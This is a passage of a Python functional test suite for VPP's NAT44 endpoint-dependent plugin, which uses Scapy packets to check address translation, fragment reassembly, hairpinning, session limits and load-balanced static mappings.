p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.src, self.pg5.remote_ip4)
self.assertEqual(tcp.sport, local_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
# from client VRF1 to server VRF0 (no translation)
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg6.remote_ip4) /
TCP(sport=local_port, dport=12349))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg6.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.src, self.pg0.remote_ip4)
self.assertEqual(tcp.sport, local_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
# from server VRF0 back to client VRF1 (no translation)
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg6.remote_ip4) /
TCP(sport=local_port, dport=12349))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg6.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.src, self.pg0.remote_ip4)
self.assertEqual(tcp.sport, local_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
# from client VRF0 to server VRF1 (no translation)
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg5.remote_ip4) /
TCP(sport=12344, dport=local_port))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg5.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.dst, self.pg5.remote_ip4)
self.assertEqual(tcp.dport, local_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
# from server VRF1 back to client VRF0 (no translation)
p = (Ether(src=self.pg5.remote_mac, dst=self.pg5.local_mac) /
IP(src=self.pg5.remote_ip4, dst=self.pg0.remote_ip4) /
TCP(sport=local_port, dport=12344))
self.pg5.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.src, self.pg5.remote_ip4)
self.assertEqual(tcp.sport, local_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
def test_outside_address_distribution(self):
""" Outside address distribution based on source address """
x = 100
nat_addresses = []
for i in range(1, x):
a = "10.0.0.%d" % i
nat_addresses.append(a)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
self.vapi.nat44_add_del_address_range(
first_ip_address=nat_addresses[0],
last_ip_address=nat_addresses[-1],
vrf_id=0xFFFFFFFF, is_add=1, flags=0)
self.pg0.generate_remote_hosts(x)
pkts = []
for i in range(x):
info = self.create_packet_info(self.pg0, self.pg1)
payload = self.info_to_payload(info)
p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_hosts[i].ip4,
dst=self.pg1.remote_ip4) /
UDP(sport=7000+i, dport=8000+i) /
Raw(payload))
info.data = p
pkts.append(p)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
recvd = self.pg1.get_capture(len(pkts))
for p_recvd in recvd:
payload_info = self.payload_to_info(p_recvd[Raw])
packet_index = payload_info.index
info = self._packet_infos[packet_index]
self.assertTrue(info is not None)
self.assertEqual(packet_index, info.index)
p_sent = info.data
packed = socket.inet_aton(p_sent[IP].src)
numeric = struct.unpack("!L", packed)[0]
numeric = socket.htonl(numeric)
a = nat_addresses[(numeric-1) % len(nat_addresses)]
self.assertEqual(
a, p_recvd[IP].src,
"Invalid packet (src IP %s translated to %s, but expected %s)"
% (p_sent[IP].src, p_recvd[IP].src, a))
class TestNAT44EDMW(TestNAT44ED):
""" NAT44ED MW Test Case """
vpp_worker_count = 4
max_sessions = 5000
def test_dynamic(self):
""" NAT44ED dynamic translation test """
pkt_count = 1500
tcp_port_offset = 20
udp_port_offset = 20
icmp_id_offset = 20
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
# in2out
tc1 = self.statistics['/nat44-ed/in2out/slowpath/tcp']
uc1 = self.statistics['/nat44-ed/in2out/slowpath/udp']
ic1 = self.statistics['/nat44-ed/in2out/slowpath/icmp']
dc1 = self.statistics['/nat44-ed/in2out/slowpath/drops']
i2o_pkts = [[] for x in range(0, self.vpp_worker_count)]
for i in range(pkt_count):
p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=tcp_port_offset + i, dport=20))
i2o_pkts[p[TCP].sport % self.vpp_worker_count].append(p)
p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
UDP(sport=udp_port_offset + i, dport=20))
i2o_pkts[p[UDP].sport % self.vpp_worker_count].append(p)
p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
ICMP(id=icmp_id_offset + i, type='echo-request'))
i2o_pkts[p[ICMP].id % self.vpp_worker_count].append(p)
for i in range(0, self.vpp_worker_count):
if len(i2o_pkts[i]) > 0:
self.pg0.add_stream(i2o_pkts[i], worker=i)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(pkt_count * 3, timeout=5)
if_idx = self.pg0.sw_if_index
tc2 = self.statistics['/nat44-ed/in2out/slowpath/tcp']
uc2 = self.statistics['/nat44-ed/in2out/slowpath/udp']
ic2 = self.statistics['/nat44-ed/in2out/slowpath/icmp']
dc2 = self.statistics['/nat44-ed/in2out/slowpath/drops']
self.assertEqual(
tc2[:, if_idx].sum() - tc1[:, if_idx].sum(), pkt_count)
self.assertEqual(
uc2[:, if_idx].sum() - uc1[:, if_idx].sum(), pkt_count)
self.assertEqual(
ic2[:, if_idx].sum() - ic1[:, if_idx].sum(), pkt_count)
self.assertEqual(dc2[:, if_idx].sum() - dc1[:, if_idx].sum(), 0)
self.logger.info(self.vapi.cli("show trace"))
# out2in
tc1 = self.statistics['/nat44-ed/out2in/fastpath/tcp']
uc1 = self.statistics['/nat44-ed/out2in/fastpath/udp']
ic1 = self.statistics['/nat44-ed/out2in/fastpath/icmp']
dc1 = self.statistics['/nat44-ed/out2in/fastpath/drops']
recvd_tcp_ports = set()
recvd_udp_ports = set()
recvd_icmp_ids = set()
for p in capture:
if TCP in p:
recvd_tcp_ports.add(p[TCP].sport)
if UDP in p:
recvd_udp_ports.add(p[UDP].sport)
if ICMP in p:
recvd_icmp_ids.add(p[ICMP].id)
recvd_tcp_ports = list(recvd_tcp_ports)
recvd_udp_ports = list(recvd_udp_ports)
recvd_icmp_ids = list(recvd_icmp_ids)
o2i_pkts = [[] for x in range(0, self.vpp_worker_count)]
for i in range(pkt_count):
p = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
TCP(dport=choice(recvd_tcp_ports), sport=20))
o2i_pkts[p[TCP].dport % self.vpp_worker_count].append(p)
p = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
UDP(dport=choice(recvd_udp_ports), sport=20))
o2i_pkts[p[UDP].dport % self.vpp_worker_count].append(p)
p = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
ICMP(id=choice(recvd_icmp_ids), type='echo-reply'))
o2i_pkts[p[ICMP].id % self.vpp_worker_count].append(p)
for i in range(0, self.vpp_worker_count):
if len(o2i_pkts[i]) > 0:
self.pg1.add_stream(o2i_pkts[i], worker=i)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(pkt_count * 3)
for packet in capture:
try:
self.assert_packet_checksums_valid(packet)
self.assertEqual(packet[IP].dst, self.pg0.remote_ip4)
if packet.haslayer(TCP):
self.assert_in_range(
packet[TCP].dport, tcp_port_offset,
tcp_port_offset + pkt_count, "dst TCP port")
elif packet.haslayer(UDP):
self.assert_in_range(
packet[UDP].dport, udp_port_offset,
udp_port_offset + pkt_count, "dst UDP port")
else:
self.assert_in_range(
packet[ICMP].id, icmp_id_offset,
icmp_id_offset + pkt_count, "ICMP id")
except:
self.logger.error(ppp("Unexpected or invalid packet "
"(inside network):", packet))
raise
if_idx = self.pg1.sw_if_index
tc2 = self.statistics['/nat44-ed/out2in/fastpath/tcp']
uc2 = self.statistics['/nat44-ed/out2in/fastpath/udp']
ic2 = self.statistics['/nat44-ed/out2in/fastpath/icmp']
dc2 = self.statistics['/nat44-ed/out2in/fastpath/drops']
self.assertEqual(
tc2[:, if_idx].sum() - tc1[:, if_idx].sum(), pkt_count)
self.assertEqual(
uc2[:, if_idx].sum() - uc1[:, if_idx].sum(), pkt_count)
self.assertEqual(
ic2[:, if_idx].sum() - ic1[:, if_idx].sum(), pkt_count)
self.assertEqual(dc2[:, if_idx].sum() - dc1[:, if_idx].sum(), 0)
sc = self.statistics['/nat44-ed/total-sessions']
self.assertEqual(sc[:, 0].sum(), len(recvd_tcp_ports) +
len(recvd_udp_ports) + len(recvd_icmp_ids))
def test_frag_in_order(self):
""" NAT44ED translate fragments arriving in order """
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
self.frag_in_order(proto=IP_PROTOS.tcp, ignore_port=True)
self.frag_in_order(proto=IP_PROTOS.udp, ignore_port=True)
self.frag_in_order(proto=IP_PROTOS.icmp, ignore_port=True)
def test_frag_in_order_do_not_translate(self):
""" NAT44ED don't translate fragments arriving in order """
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
self.vapi.nat44_forwarding_enable_disable(enable=True)
self.frag_in_order(proto=IP_PROTOS.tcp, dont_translate=True)
def test_frag_out_of_order(self):
""" NAT44ED translate fragments arriving out of order """
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
self.frag_out_of_order(proto=IP_PROTOS.tcp, ignore_port=True)
self.frag_out_of_order(proto=IP_PROTOS.udp, ignore_port=True)
self.frag_out_of_order(proto=IP_PROTOS.icmp, ignore_port=True)
def test_frag_in_order_in_plus_out(self):
""" NAT44ED in+out interface fragments in order """
in_port = self.random_port()
out_port = self.random_port()
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg0)
self.nat_add_inside_interface(self.pg1)
self.nat_add_outside_interface(self.pg1)
# add static mappings for server
self.nat_add_static_mapping(self.server_addr,
self.nat_addr,
in_port,
out_port,
proto=IP_PROTOS.tcp)
self.nat_add_static_mapping(self.server_addr,
self.nat_addr,
in_port,
out_port,
proto=IP_PROTOS.udp)
self.nat_add_static_mapping(self.server_addr,
self.nat_addr,
proto=IP_PROTOS.icmp)
# run tests for each protocol
self.frag_in_order_in_plus_out(self.server_addr,
self.nat_addr,
in_port,
out_port,
IP_PROTOS.tcp)
self.frag_in_order_in_plus_out(self.server_addr,
self.nat_addr,
in_port,
out_port,
IP_PROTOS.udp)
self.frag_in_order_in_plus_out(self.server_addr,
self.nat_addr,
in_port,
out_port,
IP_PROTOS.icmp)
def test_frag_out_of_order_in_plus_out(self):
""" NAT44ED in+out interface fragments out of order """
in_port = self.random_port()
out_port = self.random_port()
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg0)
self.nat_add_inside_interface(self.pg1)
self.nat_add_outside_interface(self.pg1)
# add static mappings for server
self.nat_add_static_mapping(self.server_addr,
self.nat_addr,
in_port,
out_port,
proto=IP_PROTOS.tcp)
self.nat_add_static_mapping(self.server_addr,
self.nat_addr,
in_port,
out_port,
proto=IP_PROTOS.udp)
self.nat_add_static_mapping(self.server_addr,
self.nat_addr,
proto=IP_PROTOS.icmp)
# run tests for each protocol
self.frag_out_of_order_in_plus_out(self.server_addr,
self.nat_addr,
in_port,
out_port,
IP_PROTOS.tcp)
self.frag_out_of_order_in_plus_out(self.server_addr,
self.nat_addr,
in_port,
out_port,
IP_PROTOS.udp)
self.frag_out_of_order_in_plus_out(self.server_addr,
self.nat_addr,
in_port,
out_port,
IP_PROTOS.icmp)
def test_reass_hairpinning(self):
""" NAT44ED fragments hairpinning """
server_addr = self.pg0.remote_hosts[1].ip4
host_in_port = self.random_port()
server_in_port = self.random_port()
server_out_port = self.random_port()
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
# add static mapping for server
self.nat_add_static_mapping(server_addr, self.nat_addr,
server_in_port, server_out_port,
proto=IP_PROTOS.tcp)
self.nat_add_static_mapping(server_addr, self.nat_addr,
server_in_port, server_out_port,
proto=IP_PROTOS.udp)
self.nat_add_static_mapping(server_addr, self.nat_addr)
self.reass_hairpinning(server_addr, server_in_port, server_out_port,
host_in_port, proto=IP_PROTOS.tcp,
ignore_port=True)
self.reass_hairpinning(server_addr, server_in_port, server_out_port,
host_in_port, proto=IP_PROTOS.udp,
ignore_port=True)
self.reass_hairpinning(server_addr, server_in_port, server_out_port,
host_in_port, proto=IP_PROTOS.icmp,
ignore_port=True)
def test_session_limit_per_vrf(self):
""" NAT44ED per vrf session limit """
inside = self.pg0
inside_vrf10 = self.pg2
outside = self.pg1
limit = 5
# 2 interfaces pg0, pg1 (vrf10, limit 1 tcp session)
# non existing vrf_id makes process core dump
self.vapi.nat44_set_session_limit(session_limit=limit, vrf_id=10)
self.nat_add_inside_interface(inside)
self.nat_add_inside_interface(inside_vrf10)
self.nat_add_outside_interface(outside)
# vrf independent
self.nat_add_interface_address(outside)
# BUG: causing core dump - when bad vrf_id is specified
# self.nat_add_address(outside.local_ip4, vrf_id=20)
stream = self.create_tcp_stream(inside_vrf10, outside, limit * 2)
inside_vrf10.add_stream(stream)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = outside.get_capture(limit)
stream = self.create_tcp_stream(inside, outside, limit * 2)
inside.add_stream(stream)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = outside.get_capture(len(stream))
def test_show_max_translations(self):
""" NAT44ED API test - max translations per thread """
nat_config = self.vapi.nat_show_config_2()
self.assertEqual(self.max_sessions,
nat_config.max_translations_per_thread)
def test_lru_cleanup(self):
""" NAT44ED LRU cleanup algorithm """
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
self.vapi.nat_set_timeouts(
udp=1, tcp_established=7440, tcp_transitory=30, icmp=1)
tcp_port_out = self.init_tcp_session(self.pg0, self.pg1, 2000, 80)
pkts = []
for i in range(0, self.max_sessions - 1):
p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4, ttl=64) /
UDP(sport=7000+i, dport=80))
pkts.append(p)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.get_capture(len(pkts))
self.sleep(1.5, "wait for timeouts")
pkts = []
for i in range(0, self.max_sessions - 1):
p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4, ttl=64) /
ICMP(id=8000+i, type='echo-request'))
pkts.append(p)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.get_capture(len(pkts))
def test_session_rst_timeout(self):
""" NAT44ED session RST timeouts """
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
self.vapi.nat_set_timeouts(udp=300, tcp_established=7440,
tcp_transitory=5, icmp=60)
self.init_tcp_session(self.pg0, self.pg1, self.tcp_port_in,
self.tcp_external_port)
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=self.tcp_port_in, dport=self.tcp_external_port,
flags="R"))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.get_capture(1)
self.sleep(6)
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=self.tcp_port_in + 1, dport=self.tcp_external_port + 1,
flags="S"))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.get_capture(1)
def test_dynamic_out_of_ports(self):
""" NAT44ED dynamic translation test: out of ports """
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
# in2out and no NAT addresses added
err_old = self.statistics.get_err_counter(
'/err/nat44-ed-in2out-slowpath/out of ports')
pkts = self.create_stream_in(self.pg0, self.pg1)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.get_capture(0, timeout=1)
err_new = self.statistics.get_err_counter(
'/err/nat44-ed-in2out-slowpath/out of ports')
self.assertEqual(err_new - err_old, len(pkts))
# in2out after NAT addresses added
self.nat_add_address(self.nat_addr)
err_old = self.statistics.get_err_counter(
'/err/nat44-ed-in2out-slowpath/out of ports')
pkts = self.create_stream_in(self.pg0, self.pg1)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(len(pkts))
self.verify_capture_out(capture, ignore_port=True)
err_new = self.statistics.get_err_counter(
'/err/nat44-ed-in2out-slowpath/out of ports')
self.assertEqual(err_new, err_old)
def test_unknown_proto(self):
""" NAT44ED translate packet with unknown protocol """
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
# in2out
p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=self.tcp_port_in, dport=20))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
p = self.pg1.get_capture(1)
p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
GRE() /
IP(src=self.pg2.remote_ip4, dst=self.pg2.remote_ip4) /
TCP(sport=1234, dport=1234))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
p = self.pg1.get_capture(1)
packet = p[0]
try:
self.assertEqual(packet[IP].src, self.nat_addr)
self.assertEqual(packet[IP].dst, self.pg1.remote_ip4)
self.assertEqual(packet.haslayer(GRE), 1)
self.assert_packet_checksums_valid(packet)
except:
self.logger.error(ppp("Unexpected or invalid packet:", packet))
raise
# out2in
p = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
GRE() /
IP(src=self.pg2.remote_ip4, dst=self.pg2.remote_ip4) /
TCP(sport=1234, dport=1234))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
p = self.pg0.get_capture(1)
packet = p[0]
try:
self.assertEqual(packet[IP].src, self.pg1.remote_ip4)
self.assertEqual(packet[IP].dst, self.pg0.remote_ip4)
self.assertEqual(packet.haslayer(GRE), 1)
self.assert_packet_checksums_valid(packet)
except:
self.logger.error(ppp("Unexpected or invalid packet:", packet))
raise
def test_hairpinning_unknown_proto(self):
""" NAT44ED translate packet with unknown protocol - hairpinning """
host = self.pg0.remote_hosts[0]
server = self.pg0.remote_hosts[1]
host_in_port = 1234
server_out_port = 8765
server_nat_ip = "10.0.0.11"
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
# add static mapping for server
self.nat_add_static_mapping(server.ip4, server_nat_ip)
# host to server
p = (Ether(src=host.mac, dst=self.pg0.local_mac) /
IP(src=host.ip4, dst=server_nat_ip) /
TCP(sport=host_in_port, dport=server_out_port))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg0.get_capture(1)
p = (Ether(dst=self.pg0.local_mac, src=host.mac) /
IP(src=host.ip4, dst=server_nat_ip) /
GRE() /
IP(src=self.pg2.remote_ip4, dst=self.pg2.remote_ip4) /
TCP(sport=1234, dport=1234))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
p = self.pg0.get_capture(1)
packet = p[0]
try:
self.assertEqual(packet[IP].src, self.nat_addr)
self.assertEqual(packet[IP].dst, server.ip4)
self.assertEqual(packet.haslayer(GRE), 1)
self.assert_packet_checksums_valid(packet)
except:
self.logger.error(ppp("Unexpected or invalid packet:", packet))
raise
# server to host
p = (Ether(dst=self.pg0.local_mac, src=server.mac) /
IP(src=server.ip4, dst=self.nat_addr) /
GRE() /
IP(src=self.pg2.remote_ip4, dst=self.pg2.remote_ip4) /
TCP(sport=1234, dport=1234))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
p = self.pg0.get_capture(1)
packet = p[0]
try:
self.assertEqual(packet[IP].src, server_nat_ip)
self.assertEqual(packet[IP].dst, host.ip4)
self.assertEqual(packet.haslayer(GRE), 1)
self.assert_packet_checksums_valid(packet)
except:
self.logger.error(ppp("Unexpected or invalid packet:", packet))
raise
def test_output_feature_and_service(self):
""" NAT44ED interface output feature and services """
external_addr = '1.2.3.4'
external_port = 80
local_port = 8080
self.vapi.nat44_forwarding_enable_disable(enable=1)
self.nat_add_address(self.nat_addr)
flags = self.config_flags.NAT_IS_ADDR_ONLY
self.vapi.nat44_add_del_identity_mapping(
ip_address=self.pg1.remote_ip4, sw_if_index=0xFFFFFFFF,
flags=flags, is_add=1)
flags = self.config_flags.NAT_IS_OUT2IN_ONLY
self.nat_add_static_mapping(self.pg0.remote_ip4, external_addr,
local_port, external_port,
proto=IP_PROTOS.tcp, flags=flags)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg0)
self.vapi.nat44_interface_add_del_output_feature(
sw_if_index=self.pg1.sw_if_index, is_add=1)
# from client to service
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=external_addr) /
TCP(sport=12345, dport=external_port))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.dst, self.pg0.remote_ip4)
self.assertEqual(tcp.dport, local_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
# from service back to client
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=local_port, dport=12345))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.src, external_addr)
self.assertEqual(tcp.sport, external_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
# from local network host to external network
pkts = self.create_stream_in(self.pg0, self.pg1)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(len(pkts))
self.verify_capture_out(capture, ignore_port=True)
pkts = self.create_stream_in(self.pg0, self.pg1)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(len(pkts))
self.verify_capture_out(capture, ignore_port=True)
# from external network back to local network host
pkts = self.create_stream_out(self.pg1)
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(len(pkts))
self.verify_capture_in(capture, self.pg0)
def test_output_feature_and_service3(self):
""" NAT44ED interface output feature and DST NAT """
external_addr = '1.2.3.4'
external_port = 80
local_port = 8080
self.vapi.nat44_forwarding_enable_disable(enable=1)
self.nat_add_address(self.nat_addr)
flags = self.config_flags.NAT_IS_OUT2IN_ONLY
self.nat_add_static_mapping(self.pg1.remote_ip4, external_addr,
local_port, external_port,
proto=IP_PROTOS.tcp, flags=flags)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg0)
self.vapi.nat44_interface_add_del_output_feature(
sw_if_index=self.pg1.sw_if_index, is_add=1)
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=external_addr) /
TCP(sport=12345, dport=external_port))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.src, self.pg0.remote_ip4)
self.assertEqual(tcp.sport, 12345)
self.assertEqual(ip.dst, self.pg1.remote_ip4)
self.assertEqual(tcp.dport, local_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=self.pg0.remote_ip4) /
TCP(sport=local_port, dport=12345))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.src, external_addr)
self.assertEqual(tcp.sport, external_port)
self.assertEqual(ip.dst, self.pg0.remote_ip4)
self.assertEqual(tcp.dport, 12345)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
def test_self_twice_nat_lb_negative(self):
""" NAT44ED Self Twice NAT local service load balancing (negative test)
"""
self.twice_nat_common(lb=True, self_twice_nat=True, same_pg=True,
client_id=2)
def test_self_twice_nat_negative(self):
""" NAT44ED Self Twice NAT (negative test) """
self.twice_nat_common(self_twice_nat=True)
def test_static_lb_multi_clients(self):
""" NAT44ED local service load balancing - multiple clients"""
external_addr = self.nat_addr
external_port = 80
local_port = 8080
server1 = self.pg0.remote_hosts[0]
server2 = self.pg0.remote_hosts[1]
server3 = self.pg0.remote_hosts[2]
locals = [{'addr': server1.ip4,
'port': local_port,
'probability': 90,
'vrf_id': 0},
{'addr': server2.ip4,
'port': local_port,
'probability': 10,
'vrf_id': 0}]
flags = self.config_flags.NAT_IS_INSIDE
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg0.sw_if_index,
flags=flags, is_add=1)
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg1.sw_if_index,
is_add=1)
self.nat_add_address(self.nat_addr)
self.vapi.nat44_add_del_lb_static_mapping(is_add=1,
external_addr=external_addr,
external_port=external_port,
protocol=IP_PROTOS.tcp,
local_num=len(locals),
locals=locals)
server1_n = 0
server2_n = 0
clients = ip4_range(self.pg1.remote_ip4, 10, 50)
pkts = []
for client in clients:
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=client, dst=self.nat_addr) /
TCP(sport=12345, dport=external_port))
pkts.append(p)
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(len(pkts))
for p in capture:
if p[IP].dst == server1.ip4:
server1_n += 1
else:
server2_n += 1
self.assertGreaterEqual(server1_n, server2_n)
local = {
'addr': server3.ip4,
'port': local_port,
'probability': 20,
'vrf_id': 0
}
# add new back-end
self.vapi.nat44_lb_static_mapping_add_del_local(
is_add=1,
external_addr=external_addr,
external_port=external_port,
local=local,
protocol=IP_PROTOS.tcp)
server1_n = 0
server2_n = 0
server3_n = 0
clients = ip4_range(self.pg1.remote_ip4, 60, 110)
pkts = []
for client in clients:
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=client, dst=self.nat_addr) /
TCP(sport=12346, dport=external_port))
pkts.append(p)
self.assertGreater(len(pkts), 0)
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(len(pkts))
for p in capture:
if p[IP].dst == server1.ip4:
server1_n += 1
elif p[IP].dst == server2.ip4:
server2_n += 1
else:
server3_n += 1
self.assertGreater(server1_n, 0)
self.assertGreater(server2_n, 0)
self.assertGreater(server3_n, 0)
local = {
'addr': server2.ip4,
'port': local_port,
'probability': 10,
'vrf_id': 0
}
# remove one back-end
self.vapi.nat44_lb_static_mapping_add_del_local(
is_add=0,
external_addr=external_addr,
external_port=external_port,
local=local,
protocol=IP_PROTOS.tcp)
server1_n = 0
server2_n = 0
server3_n = 0
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(len(pkts))
for p in capture:
if p[IP].dst == server1.ip4:
server1_n += 1
elif p[IP].dst == server2.ip4:
server2_n += 1
else:
